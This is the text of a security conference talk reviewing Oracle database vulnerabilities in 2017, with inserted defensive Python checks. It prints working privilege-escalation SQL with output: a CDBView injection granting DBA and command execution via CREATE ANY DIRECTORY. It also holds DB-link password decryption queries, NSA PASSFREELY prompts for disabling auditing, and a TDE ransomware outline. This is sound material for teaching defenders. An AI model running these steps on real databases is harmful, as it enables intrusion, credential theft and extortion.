DOAG BEST OF 2017 · 2018-11-25 · Oracle Security Patches ! Krieg… ! Outlook 2018. Database...


Best of Oracle Security 2017

What happened in 2017?

Agenda

• Intro
• January 2017 - October 2017 CPUs
• NSA & Database Hacking
• Outlook 2018
• Q&A

Introduction

What will be shown in the next 45 minutes?

• Oracle Security Patches
• Krieg…
• Outlook 2018

Database Vulnerabilities and CPU

Again, the patch situation has improved (down from 30 vulnerabilities in 2016 to 14 in 2017)

Problem: At the moment only a few people are looking for security bugs in the database

Nowadays it’s rare that exploit code for databases is published

In 2017 prices for exploits went down

Exploit prices down in 2017

https://vuldb.com/?exploits

Exploit prices down in 2017

https://vuldb.com/?exploits.top

Jul 2017 CVE-2017-10202

https://vuldb.com/?id.103781

Current Price Estimation: $25k-$100k (0-day) / $5k-$25k (Today)

Oracle Vulnerabilities 2017


Number of vulnerabilities in Oracle database reduced again

• 14 findings in 2017 (2016: 30, 2015: 29, 2014: 43, 2013: 13, 2012: 17)

• 4 remotely exploitable bugs (2016: 8, 2015: 3, 2014: 4, 2013: 7, 2012: 8)

• January 2017 CPU (2 Vulnerabilities – 0 remote)

• April 2017 CPU (2 Vulnerabilities – 0 remote)

• July 2017 CPU (4 Vulnerabilities – 2 remote)

• October 2017 CPU (6 Vulnerabilities – 2 remote)

2017

Dec 2016

Oracle 12.1 Exploit

* https://mahmoudhatem.wordpress.com/2016/12/14/sql-injection-vulnerability-cdbview-package/

Oracle 12.1 Exploit I

SQL> conn doag2017/doag2017
Connect durchgeführt.

SQL> select granted_role from user_role_privs;

CONNECT
EXECUTE_CATALOG_ROLE

SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to doag2017''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');

Oracle 12.1 Exploit II

SQL> select /*+WITH_PLSQL*/ * from ALL_CUBES;

1

SQL> select granted_role from user_role_privs;

CONNECT
DBA
EXECUTE_CATALOG_ROLE

January 2017

Oracle CPU January 2017 *

* http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html

January 2017 CPU*

2 security fixes (none remotely exploitable)

1 OJVM (CVSS 9.0)

1 RDBMS (CVSS 3.3)

* http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html

February 2017

nothing special happened

March 2017

Blog Entry: „Create any directory“=DBA=SYSDBA ! Ouch*

Blog Entry: CREATE ANY DIRECTORY threats : PDBs and the PATH_PREFIX clause**

Reverse engineering DB Link password decryption in PL/SQL***

* https://mahmoudhatem.wordpress.com/2017/03/03/create-any-directorydbasysdba-ouch/
** https://mahmoudhatem.wordpress.com/2017/03/07/create-any-directory-threats-pdbs-and-the-path_prefix-clause/#more-6017
*** https://mahmoudhatem.wordpress.com/2016/12/08/reverse-engineering-db-link-password-decryption-in-plsql/

Exploit - Create any directory I

declare
  v_file utl_file.file_type;
begin
  v_file := utl_file.fopen('TEMP_DIR', 'execute_me.sh', 'w');
  utl_file.put_line(v_file, 'export PATH=/usr/local/bin:/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/sbin');
  utl_file.put_line(v_file, 'export ORACLE_HOME=/oracle11/product/11.2.0/dbhome_1');
  utl_file.put_line(v_file, 'export ORACLE_SID=testdb');
  utl_file.put_line(v_file, 'export PATH=$ORACLE_HOME/bin:$PATH');
  utl_file.put_line(v_file, 'ps -ef | grep pmon');
  utl_file.fclose(v_file);
end;
/

Exploit - Create any directory II

CREATE TABLE exec_command (
  txt varchar2(4000)
)
ORGANIZATION EXTERNAL (
  TYPE ORACLE_LOADER
  DEFAULT DIRECTORY temp_dir
  ACCESS PARAMETERS (
    RECORDS DELIMITED BY NEWLINE
    PREPROCESSOR exec_dir:'bash'
    FIELDS TERMINATED BY ','
    MISSING FIELD VALUES ARE NULL
    ( txt )
  )
  LOCATION ('execute_me.sh')
);

Exploit - Create any directory III

select * from exec_command;

Escape from PDB without PATH_PREFIX

The CREATE ANY DIRECTORY privilege can be used to escape from a PDB. Oracle 12.1 introduced the PATH_PREFIX clause to prevent this attack, but it was not effective in 12.1.

** https://mahmoudhatem.wordpress.com/2017/03/07/create-any-directory-threats-pdbs-and-the-path_prefix-clause/#more-6017

PDB without PATH_PREFIX

SQL> create pluggable database pdb_prefix admin user pdbprefix identified by test123 PATH_PREFIX='/oracle/path_prefix/';

Pluggable database created.

SQL> alter session set container=pdb_prefix;

Session altered.

SQL> create directory temp_dir as '/tmp';

ORA-65254: invalid path specified for the directory

SQL> declare v_file utl_file.file_type; begin. …. utl_file.fclose(v_file); end; /

PL/SQL procedure successfully completed.

ll /
-rw------- 1 oracle oinstall 205 Mar 7 14:41 execute_me.sh

PDB with PATH_PREFIX

SQL> create pluggable database pdb_prefix admin user pdbprefix identified by test123 PATH_PREFIX='/oracle/path_prefix/';

Pluggable database created.

SQL> alter session set container=pdb_prefix;

Session altered.

SQL> create directory temp_dir as '/tmp';

ORA-65254: invalid path specified for the directory

SQL> create directory temp_dir as 'tmp';

Directory created.

SQL> declare v_file utl_file.file_type; begin. …. utl_file.fclose(v_file); end; /

PL/SQL procedure successfully completed.

ll /oracle/path_prefix
-rw------- 1 oracle oinstall 205 Mar 7 14:41 execute_me.sh
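The session above shows the fixed behaviour: with PATH_PREFIX set, an absolute CREATE DIRECTORY path is rejected (ORA-65254) and a relative path lands below the prefix. The following added example (not from the talk or from the referenced blog) models that rule and runs it over a snapshot of directory objects to find those that still resolve outside their PDB's prefix; the '..' normalisation check, the snapshot format and the sample rows are this script's own assumptions.

```python
"""Offline check of PDB directory objects against each PDB's PATH_PREFIX."""
import posixpath


def resolve_directory_path(path_prefix, directory_path):
    """Return (effective_path, escapes_prefix) for a CREATE DIRECTORY path.

    Without a prefix the path is used as given and nothing confines it.
    With a prefix an absolute path is rejected, as the ORA-65254 output above
    shows; a relative path is joined to the prefix and normalised, so a path
    such as '../../tmp' is reported as an escape (assumption: the normalised
    comparison is this script's check, not an Oracle behaviour quoted above).
    """
    if not path_prefix:
        return posixpath.normpath(directory_path), True
    prefix = posixpath.normpath(path_prefix)
    if posixpath.isabs(directory_path):
        raise ValueError("ORA-65254: invalid path specified for the directory")
    effective = posixpath.normpath(posixpath.join(prefix, directory_path))
    inside = effective == prefix or effective.startswith(prefix + "/")
    return effective, not inside


def audit_pdb_directories(pdb_prefixes, directories):
    """Report every directory object that resolves outside its PDB's prefix.

    pdb_prefixes: {pdb_name: path_prefix or ''}
    directories:  iterable of (pdb_name, directory_name, directory_path),
                  e.g. exported from CDB_DIRECTORIES (constructed here)
    Returns a list of (pdb_name, directory_name, effective_path, reason).
    """
    findings = []
    for pdb, name, path in directories:
        prefix = pdb_prefixes.get(pdb, "")
        try:
            effective, escapes = resolve_directory_path(prefix, path)
        except ValueError as err:
            # An absolute path in a prefixed PDB: would be rejected today.
            findings.append((pdb, name, path, str(err)))
            continue
        if escapes:
            reason = "no PATH_PREFIX set" if not prefix else "resolves outside PATH_PREFIX"
            findings.append((pdb, name, effective, reason))
    return findings


# Constructed sample data: one PDB without a prefix (the unprotected situation
# shown above) and one with the prefix used in the talk.
SAMPLE_PREFIXES = {"PDB_OLD": "", "PDB_PREFIX": "/oracle/path_prefix/"}
SAMPLE_DIRECTORIES = [
    ("PDB_OLD", "TEMP_DIR", "/tmp"),         # unconfined: escape
    ("PDB_PREFIX", "TEMP_DIR", "tmp"),       # lands in /oracle/path_prefix/tmp
    ("PDB_PREFIX", "UP_DIR", "../../tmp"),   # climbs out of the prefix
]

if __name__ == "__main__":
    for finding in audit_pdb_directories(SAMPLE_PREFIXES, SAMPLE_DIRECTORIES):
        print(finding)
```

Run it against an export of CDB_DIRECTORIES together with the prefix configured for each PDB; every finding is a directory object that lets a PDB user write outside the area the PDB was meant to be confined to.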

Short history of DB Link Passwords*

<= 10.2: select password from sys.link$;

<= 11.2.0.3: select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) from sys.link$;

** https://blogs.loopback.org/2014/06/db-link-passworter-metadaten-in-11-2-0-4/

Database Link Passwords 11.2-12.2

SELECT VALUE$ FROM SYS.PROPS$ WHERE name = 'NO_USERID_VERIFIER_SALT';

readelf -s oracle | grep ztcshpl_v6
112105: 0000000010b9ee40 16384 OBJECT  LOCAL  DEFAULT   29 ztcshpl_v6

Run script db_link_password_decrypt.sql. **

exec db_link_password_decrypt('17B21F905CE739E2759E6FB99745650E','076C8B8463098676E408141A154CF4C20AAF19A52CF7FEF3CD8A99830A82F9D8F129665C2F395DF4F30EBE15E48D78096E9BD8AC1012D24525982CE3C828BE298EA798D6FBD8A18379DEE803692B773B86570AB2DA90EA121124D6D0F228818D18812B42C77AE6D0F4BF257627643EEC34FB9A6C2EF6185D7302EF30673A2F4C');

* https://mahmoudhatem.wordpress.com/2016/12/08/reverse-engineering-db-link-password-decryption-in-plsql/
** https://github.com/hatem-mahmoud/scripts/blob/master/db_link_password_decrypt.sql


April 2017

Oracle CPU April 2017*

PassFreely Attack Bypasses Oracle Database Authentication**

Shadow Brokers released a toolset from the Equation Group (aka NSA)

* http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
** https://www.bankinfosecurity.com/passfreely-attack-bypasses-oracle-database-authentication-a-9868

April 2017 CPU*

2 security fixes (none remotely exploitable)

1 SQL*Plus (CVSS 7.2)

1 OJVM (CVSS 5.3)

* http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html

http://www.inside-it.ch/articles/48930

NSA Oracle Tool

Shadow Brokers & NSA

On April 8th, 2017, The Shadow Brokers published the password for an encrypted dump. The dump contains several tools and exploits from the NSA; some of these exploits were used in later worldwide attacks (e.g. WannaCry). Some of the tools target databases (Oracle, SQL Server, SQLite). The collection can be analyzed at https://github.com/misterch0c/shadowbroker

https://www.mnemonic.no/no/nyheter/2017/advisory---data-leakage-of-multiple-0-days-and-tools/

Analysis

Some features of the NSA Toolkit

Oracle (Hacking) Plugins

• Disable authentication using PASSFREELY (passwords are no longer checked); supported from Oracle 7.2.2.4.0 up to the latest version
• Disable Oracle auditing to avoid traces
• Backdoor (?) - Oracle_Implant.dll
• Connection String Wizard
• Run a standard query
• Read the top 10 rows from every table
• Run a folder of queries
• Write results to CSV
• Unicode support for foreign languages
• …

Already seen before at the DOAG conference

• Disable Oracle Authentication (Best of Oracle Security 2011)
• Disable Oracle Auditing to avoid traces (Best of Oracle Security 2013)
• Backdoor (?) - Oracle_Implant.dll (Oracle Rootkits – eine neue Gefahr für Datenbanken?)

Some Output from the NSA tools

User friendly


Oracle can log in: 1) the Windows Application Event Logs 2) the listener.log file 3) its internal auditing mechanisms (including the Enterprise Manager console)

We're going to check the first two, but we can't run the detailed auditing check (#3) until you connect to the database.

Once this is finished, connect and run the Detailed Audit Check Query Plan!

Sound good?

Audit check complete, don't forget to run the Detailed Audit Check query plan after you connect!

If you'd like to disable auditing or enable PASSFREELY select one of the options below. Otherwise continue by pressing 0:

Run 'audit -disable all'

Run PASSFREELY (oracle -memcheck && oracle -open)

If you'd like to reenable auditing or remove PASSFREELY select one of the options below. Otherwise continue by pressing 0:

User friendly

Any 'sys' logins will be logged even if using PASSFREELY! You'd better know what you're doing!

Are you sure you'd like to run 'audit -disable all'? (Make sure you don't have security auditing dorked!)

audit -disable all

DISABLING AUDITING FAILED!!! GO GET HELP!

User friendly


Run the "oracle -memcheck" command to make sure that we can exploit this database.

Run the "oracle -crc" command to determine version

PROBLEM FOUND! There is an unknown version of Oracle running on the box!
It could be that you just need an updated version of PASSFREELY. If not, you should grab the Oracle symbol file and executable that failed the CRC check above! OK, that wasn't it or at least I couldn't fix the problem. It could be that this is an unknown version of Oracle (verify that the CRC identified a version string) If the version isn't identified, then that is the problem, otherwise the problem is with PASSFREELY itself, so please contact the developer!

If the version is unknown, you should bring back the Oracle executable and the associated symbol file so that it can be incorporated it into this plugin.

User friendly


You need to look over the file we just downloaded before proceeding! At a minimum you should review the section: Database Usage by User and Tablespace You should also check to see if there are Partitioned tables for any users of interest.

Do you want to survey the database users

Type of data sample
1 - Sample using Table Partitions
2 - Sample using Table Partitions without Row Counts
3 - Sample without using Table Partitions
4 - Sample without using Table Paritions and without Row Counts
5 - Just get Row Counts and Table Descriptions

Enter the number of the type of data sample you want

User friendly


Do you have cracked passwords for a user of interest (OR for the SYS or SYSTEM user)?
Do you want to perform database exports for any users?
Are you wanting to include the Constraints and Indexes in the export file? (You probably only want this if exporting everything)
What is the name of the user you want to export?
Do you have the password for this user ($expuser)?

Done with database exports. Waiting for all files to complete downloading before continuing. Done.
Do you want to delete the copy of $sidchoice\_Passwords_To_Crack.txt that is in the directory $tempDownloadDirPath?

Done with the Oracle survey ... that was easy!

Passfreely Supported versions

• Oracle Database v 7.2.2.4.0
• Oracle Database v 7.3.2.2.0
• Oracle Database v 7.3.2.3.15
• Oracle Database v 7.3.3.0.0
• Oracle Database v 7.3.3.5.3
• Oracle Database v 7.3.3.6.0
• Oracle Database v 7.3.4.0.0
• Oracle Database v 7.3.4.4.0
• Oracle Database v 7.3.4.5.0
• Oracle Database v 7.3.4.5.2
• Oracle Database v 8.0.3.0.0
• Oracle Database v 8.0.3.2.3
• Oracle Database v 8.0.4.0.0
• Oracle Database v 8.0.4.0.1
• Oracle Database v 8.0.4.3.5
• Oracle Database v 8.0.4.3.8
• Oracle Database v 8.0.4.4.0
• Oracle Database v 8.0.4.4.1
• Oracle Database v 8.0.5.0.0
• …
• Oracle Database v 11.1.0.7
• Oracle Database v 11.1.0.7 Patch 1
• Oracle Database v 11.1.0.7 Patch 10
• Oracle Database v 11.1.0.7 Patch 11
• Oracle Database v 11.1.0.7 Patch 12
• Oracle Database v 11.1.0.7 Patch 13
• Oracle Database v 11.1.0.7 Patch 14
• Oracle Database v 11.1.0.7 Patch 15
• Oracle Database v 11.1.0.7 Patch 16
• Oracle Database v 11.1.0.7 Patch 17
• Oracle Database v 11.1.0.7 Patch 2
• Oracle Database v 11.1.0.7 Patch 3
• Oracle Database v 11.1.0.7 Patch 4
• Oracle Database v 11.1.0.7 Patch 5
• Oracle Database v 11.1.0.7 Patch 6
• Oracle Database v 11.1.0.7 Patch 7
• Oracle Database v 11.1.0.7 Patch 8
• Oracle Database v 11.1.0.7 Patch 9
• Oracle Database v 11.2.0.1 Base - 64-bit
• Oracle Database v 11.2.0.1 Patch 7 - 64-bit
• Oracle Database v 11.2.0.2 Base - 64-bit

Countermeasures

• Do not rely on standard auditing methods (e.g. Oracle Auditing)
• Certain access patterns (password hashes in sys.user$) and certain tools (e.g. exp) used without a ticket should be logged and analyzed
• Minimize the number of services on your Oracle database server
• SYS/SYSTEM access to application data should be monitored
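The second and fourth countermeasures above can be turned into detection rules that run outside the database, over audit data that the tool cannot switch off from inside (a SIEM feed, a copy of the audit trail). The following added example (not from the talk) implements three such rules on rows constructed in the shape of unified-audit columns; the 'ticket' field stands for an assumed enrichment from change management, and the schema and tool lists are site-specific assumptions.

```python
"""Detection rules for the countermeasures listed above, run over audit rows."""

# Assumed site-specific lists: schemas that are not application data, export
# tools whose use should be tied to a ticket, and the privileged accounts.
SYSTEM_SCHEMAS = {"SYS", "SYSTEM", "AUDSYS", "DBSNMP", "OUTLN", "XDB"}
EXPORT_TOOLS = {"exp", "expdp"}
PRIVILEGED_ACCOUNTS = {"SYS", "SYSTEM"}


def program_name(client_program):
    """'exp@host (TNS V1-V3)' -> 'exp': strip the host and protocol suffix."""
    return client_program.split("@", 1)[0].split(" ", 1)[0].lower()


def analyse_audit_rows(rows):
    """Return a list of (row_id, rule, detail) findings for the given rows."""
    findings = []
    for r in rows:
        owner, obj = r.get("object_schema"), r.get("object_name")
        user = r["dbusername"]
        prog = program_name(r.get("client_program_name", ""))

        # Rule 1: any read of SYS.USER$ exposes password hashes for offline cracking.
        if owner == "SYS" and obj == "USER$":
            findings.append((r["id"], "hash_access", f"{user} read SYS.USER$ via {prog}"))

        # Rule 2: export tools without a change ticket (bulk data extraction).
        if prog in EXPORT_TOOLS and not r.get("ticket"):
            findings.append((r["id"], "export_without_ticket", f"{user} ran {prog}"))

        # Rule 3: SYS/SYSTEM touching application data, which DBAs rarely need.
        if user in PRIVILEGED_ACCOUNTS and owner and owner not in SYSTEM_SCHEMAS:
            findings.append((r["id"], "privileged_app_access", f"{user} accessed {owner}.{obj}"))
    return findings


# Constructed sample rows (column names modelled on UNIFIED_AUDIT_TRAIL).
SAMPLE_ROWS = [
    {"id": 1, "dbusername": "APPUSER", "client_program_name": "sqlplus@app01 (TNS V1-V3)",
     "object_schema": "APP", "object_name": "ORDERS", "action_name": "SELECT"},
    {"id": 2, "dbusername": "SCOTT", "client_program_name": "sqlplus@ws17 (TNS V1-V3)",
     "object_schema": "SYS", "object_name": "USER$", "action_name": "SELECT"},
    {"id": 3, "dbusername": "SYSTEM", "client_program_name": "exp@ws17 (TNS V1-V3)",
     "object_schema": "APP", "object_name": "ORDERS", "action_name": "SELECT"},
    {"id": 4, "dbusername": "SYSTEM", "client_program_name": "expdp@db01 (TNS V1-V3)",
     "object_schema": "APP", "object_name": "CUSTOMERS", "action_name": "SELECT",
     "ticket": "CHG-0001"},
]

if __name__ == "__main__":
    for finding in analyse_audit_rows(SAMPLE_ROWS):
        print(finding)
```

Row 3 trips two rules at once (an export tool without a ticket, run as SYSTEM against application data), which is exactly the pattern the survey/export steps of the tool would leave behind; row 4 shows that a ticketed export still gets the privileged-access finding, so that it can be reviewed.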

May 2017

Nothing special happened

June 2017

Nothing special happened

July 2017

Oracle CPU July 2017 *

* http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html

July 2017 CPU*

4 security fixes (2 remotely exploitable)

1 OJVM (CVSS 9.9)

1 DBMS_LDAP (CVSS 6.8, remote)

1 RAC (CVSS 6.8, remote)

1 RDBMS Security (CVSS 1.9)

* http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html

Jul 2017 CVE-2014-3566

Problem: A security vulnerability affecting SSL v3.0 was recently publicly disclosed (Padding Oracle On Downgraded Legacy Encryption, or “Poodle”). This security vulnerability is the result of a design flaw in SSL v3.0. Note that this vulnerability does not affect TLS and is limited to SSL 3.0, which is widely considered as an obsolete protocol. This vulnerability has received the identifier CVE-2014-3566.

Reporter: Karthik Bhargavan and Gaetan Leurent

https://www.oracle.com/technetwork/topics/security/poodlecve-2014-3566-2339408.html

Jul 2017 CVE-2016-2183

Problem: Karthik Bhargavan and Gaetan Leurent have unveiled a new attack on Triple-DES, SWEET32, Birthday attacks on 64-bit block ciphers in TLS and OpenVPN. It has been assigned CVE-2016-2183.

Reporter: Karthik Bhargavan and Gaetan Leurent

https://www.openssl.org/blog/blog/2016/08/24/sweet32/
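Both CVEs above are protocol weaknesses, so applying the CPU only helps if the database's own TLS configuration no longer offers SSL 3.0 or 3DES suites. The following added example (not from the talk) parses the SSL_VERSION and SSL_CIPHER_SUITES parameters of a sqlnet.ora and reports settings that leave either weakness open; treating a missing SSL_VERSION as unconstrained is a conservative assumption of this script, and both sample files are constructed.

```python
"""Check sqlnet.ora TLS settings for POODLE (SSL 3.0) and SWEET32 (3DES)."""
import re

# 'NAME = value' with optional surrounding whitespace; values may be a
# parenthesised, comma-separated list.
PARAM_RE = re.compile(r"^\s*([A-Za-z_.]+)\s*=\s*(.+?)\s*$")


def parse_sqlnet(text):
    """Parse single-line parameters; '#' starts a comment. Returns {NAME: value}."""
    params = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0]
        m = PARAM_RE.match(line)
        if not m:
            continue
        name, value = m.group(1).upper(), m.group(2)
        if value.startswith("(") and value.endswith(")"):
            value = [v.strip() for v in value[1:-1].split(",") if v.strip()]
        params[name] = value
    return params


def check_tls_settings(params):
    """Return a list of findings for weak protocol or cipher-suite settings."""
    findings = []
    version = params.get("SSL_VERSION")
    # '0' means any version and '3.0' pins SSL 3.0; a missing value is treated
    # as unconstrained here (assumption) so that it is reviewed.
    if version is None or str(version).strip() in ("0", "3.0"):
        findings.append("SSL_VERSION permits SSL 3.0 (POODLE, CVE-2014-3566); set SSL_VERSION = 1.2")
    suites = params.get("SSL_CIPHER_SUITES", [])
    if isinstance(suites, str):
        suites = [suites]
    for suite in suites:
        if "3DES" in suite.upper():
            findings.append(f"64-bit block cipher suite {suite} (SWEET32, CVE-2016-2183); remove it")
    return findings


WEAK_SQLNET = """
# constructed sample: legacy settings
SSL_VERSION = 3.0
SSL_CIPHER_SUITES = (SSL_RSA_WITH_3DES_EDE_CBC_SHA, SSL_RSA_WITH_AES_128_CBC_SHA)
"""

HARDENED_SQLNET = """
# constructed sample: TLS 1.2 only, AES suites only
SSL_VERSION = 1.2
SSL_CIPHER_SUITES = (SSL_RSA_WITH_AES_256_CBC_SHA256, SSL_RSA_WITH_AES_128_CBC_SHA256)
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_SQLNET), ("hardened", HARDENED_SQLNET)):
        print(label, check_tls_settings(parse_sqlnet(text)) or ["ok"])
```

The parser deliberately handles only the single-line form of the list syntax; a multi-line SSL_CIPHER_SUITES block would need the parentheses joined first.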

August 2017

Nothing special happened

September 2017

• Hacker attacks hit more than 27,000 MongoDB databases*

https://www.heise.de/security/meldung/Hacker-Angriffe-auf-MongoDB-treffen-fast-27-000-Datenbanken-3822955.html


Encrypting Databases

• Escalate privileges to DBA
• Enable TDE with an ALTER SYSTEM command
• Encrypt important data (e.g. from business transactions). Because TDE is transparent, the application does not detect the change
• Close the wallet after one week via a database job and send an email to the CEO...
• Depending on the backup concept of the database, the important data is encrypted and only accessible if you can open the wallet. The wallet password is not known to the DBA, only to the blackmailer

Attacking Databases with Oracle TDE


Abusing TDE for Blackmailing

1. Hacker login into the database

2. Become DBA

3. Create a wallet

4. Encrypt tables

5. Inform customer after shutdown

Data is still there but encrypted. And the keys are in the wallet.
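Because the data is still there and the application keeps working, the scenario above is only visible in the dictionary: a wallet that did not exist before, columns or tablespaces that became encrypted without a change request, and finally a wallet that is CLOSED while encrypted data exists. The following added example (not from the talk) compares two dictionary snapshots and raises an alert for each of these signs; the snapshot layout is modelled on V$ENCRYPTION_WALLET.STATUS, DBA_ENCRYPTED_COLUMNS and DBA_TABLESPACES.ENCRYPTED, but the format, the approved-change list and the sample values are constructed.

```python
"""Detect the TDE blackmail pattern described above from dictionary snapshots."""


def snapshot(wallet_status, encrypted_columns=(), encrypted_tablespaces=()):
    """Build a snapshot; objects are named OWNER.TABLE.COLUMN or TS:<tablespace>."""
    objects = set(encrypted_columns) | {f"TS:{ts}" for ts in encrypted_tablespaces}
    return {"wallet_status": wallet_status, "encrypted_objects": objects}


def detect_unexpected_tde(baseline, current, approved=frozenset()):
    """Return a list of alert strings; empty when nothing changed unexpectedly.

    approved: object names whose encryption was requested through change
    management (assumed enrichment, not an Oracle view).
    """
    alerts = []
    before, after = baseline["wallet_status"], current["wallet_status"]

    # Step 3 of the scenario: a wallet appears (NOT_AVAILABLE -> OPEN) because
    # somebody created it and set a master key; any other change is worth a look.
    if before != after:
        alerts.append(f"wallet status changed: {before} -> {after}")

    # Step 4: newly encrypted objects that nobody asked for.
    for obj in sorted(current["encrypted_objects"] - baseline["encrypted_objects"]):
        if obj not in approved:
            alerts.append(f"unapproved encryption of {obj}")

    # Step 5: closed wallet with encrypted data means the data is unreadable
    # until somebody who knows the wallet password opens it.
    if after == "CLOSED" and current["encrypted_objects"]:
        alerts.append("wallet CLOSED while encrypted objects exist: data is inaccessible")
    return alerts


# Constructed snapshots following the steps above: no TDE at all, then an
# encrypted transaction column with an open wallet, then the wallet closed.
BASELINE = snapshot("NOT_AVAILABLE")
AFTER_ENCRYPT = snapshot("OPEN", encrypted_columns={"APP.TRANSACTIONS.AMOUNT"})
AFTER_CLOSE = snapshot("CLOSED", encrypted_columns={"APP.TRANSACTIONS.AMOUNT"})

if __name__ == "__main__":
    for label, current in (("day 1", AFTER_ENCRYPT), ("day 7", AFTER_CLOSE)):
        print(label, detect_unexpected_tde(BASELINE, current))
```

Taking the baseline snapshot daily and diffing it this way catches the wallet creation on day 1, a week before the job closes the wallet; after the close only a valid backup of the wallet, or the password, gets the data back.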

October 2017

Oracle CPU October 2017 *

* http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

October 2017 CPU*

6 security fixes (2 remotely exploitable)

1 Core RDBMS (CVSS 8.8)

1 Spatial (Apache Groovy) (CVSS 8.3, remote)

1 Java VM (CVSS 8.2)

1 WLM (Apache Tomcat) (CVSS 8.1, remote)

1 XMLDB (CVSS 6.5)

1 RDBMS Security (CVSS 2.3)

* http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

Oct 2017 CVE-2017-10292

Problem: Creating users with the GRANT command is not audited by „AUDIT CREATE USER“

Reporter: David Litchfield

Exploit:

GRANT DBA TO OOPSIEDAISY IDENTIFIED BY PA55W0RD1

Oct 2017 CVE-2016-6814

Problem: It was found that a flaw in the Apache Groovy library allows remote code execution wherever deserialization occurs in the application. It is possible for an attacker to craft a special serialized object that will execute code directly when deserialized. All applications which rely on serialization and do not isolate the code which deserializes objects are subject to this vulnerability.

Reporter: Sam Thomas

Oct 2017 CVE-2017-10190

https://vuldb.com/de/?id.108006

Oct 2017 CVE-2016-8735

The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.

Reporter: Pierre Ernst

http://seclists.org/oss-sec/2016/q4/502
http://blog.safebuff.com/2016/12/05/Apache-Tomcat-Remote-Code-Execution-CVE-2016-8735/

November 2017

DOAG 2017

Blog Entry „Injecting a Backdoor in an Oracle database“ *

* https://mahmoudhatem.wordpress.com/2017/11/17/injecting-a-backdoor-in-an-oracle-database/#more-8100 ** https://yurichev.com/writings/oracle.pdf

First rename the original function “snttread” to “Snttread” in the object file “sntt.o”, then inject a new wrapper function named “snttread” into the library “lib/libntcp12.a” which does all the amazing stuff if it detects the magic word, in this case “/bin/sh”.

Connecting using netcat

Findings from Security Audits in 2017

• Weak passwords
• Cleartext passwords in audit logs
• Privilege escalation via the CREATE INDEX privilege (already shown in 2016)
• Too many privileges
• …

Cleartext passwords in Oracle audit log

Sometimes the Oracle audit log contains cleartext passwords. Review the content of the audit log to identify and remove the passwords.
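The review step above and the CVE-2017-10292 finding earlier in this section (a GRANT ... IDENTIFIED BY creates a user without triggering AUDIT CREATE USER) can be handled by one pass over the audit trail's SQL text. The following added example (not from the talk) redacts cleartext passwords so the audit text can be retained, and flags GRANT statements that create users so they can be reconciled against the CREATE USER audit; the records are constructed (id, sql_text) pairs, and the regular expressions and the '***' redaction are this script's own choices.

```python
"""Scan audit-trail SQL text for cleartext passwords and user creation via GRANT."""
import re

# A cleartext password follows IDENTIFIED BY. IDENTIFIED BY VALUES carries a
# hash and IDENTIFIED EXTERNALLY/GLOBALLY carries no password, so neither is
# matched. Double-quoted passwords may contain spaces and semicolons.
PASSWORD_RE = re.compile(
    r"IDENTIFIED\s+BY\s+(?!VALUES\b)(\"[^\"]*\"|[^\s;]+)", re.IGNORECASE)

# A GRANT that names a password creates the grantee if it does not exist yet,
# and AUDIT CREATE USER does not see it (CVE-2017-10292 above).
GRANT_CREATE_RE = re.compile(
    r"^\s*GRANT\b.*\bIDENTIFIED\s+BY\b", re.IGNORECASE | re.DOTALL)


def redact_passwords(sql_text):
    """Replace every cleartext password with *** so the text can be kept."""
    return PASSWORD_RE.sub("IDENTIFIED BY ***", sql_text)


def scan_audit_records(records):
    """Return (record_id, rule, redacted_sql) findings for the given records."""
    findings = []
    for rec_id, sql_text in records:
        redacted = redact_passwords(sql_text)
        if PASSWORD_RE.search(sql_text):
            findings.append((rec_id, "cleartext_password", redacted))
        if GRANT_CREATE_RE.search(sql_text):
            findings.append((rec_id, "user_created_via_grant", redacted))
    return findings


# Constructed sample records; the first is the statement quoted in the talk.
SAMPLE_RECORDS = [
    (1, "GRANT DBA TO OOPSIEDAISY IDENTIFIED BY PA55W0RD1"),
    (2, 'CREATE USER appuser IDENTIFIED BY "s3cret pass;" DEFAULT TABLESPACE users'),
    (3, "ALTER USER appuser IDENTIFIED BY VALUES 'S:0123456789ABCDEF'"),
    (4, "CREATE USER ops IDENTIFIED EXTERNALLY"),
    (5, "select count(*) from app.orders"),
]

if __name__ == "__main__":
    for finding in scan_audit_records(SAMPLE_RECORDS):
        print(finding)
```

Every user_created_via_grant finding should have a matching entry in your user-creation review even though AUDIT CREATE USER produced none; every cleartext_password finding marks a record whose original text has to be purged from the audit store, not just from the copy you scanned.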

GDPR-DDOS

(Potential) upcoming attack in 2018: use social media (e.g. Twitter) to organize a GDPR-DDOS by asking thousands of users to exercise their rights under Art. 12 GDPR

What happens to your organization in 2018 if you get 10,000 GDPR Info request?

GDPR-Info Websites

It's possible that new GDPR-Info websites will appear where customers can request all their information from the top 10,000 companies at once.

Could you imagine how much time it would take companies to answer all these requests?

Trends 2018

Migration to 12.2

GDPR / DSGVO (May 2018)

More Data Discovery of personal data

More auditing projects

Integration of auditing with SIEM solutions

Q & A

Thank you

Contact:

Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany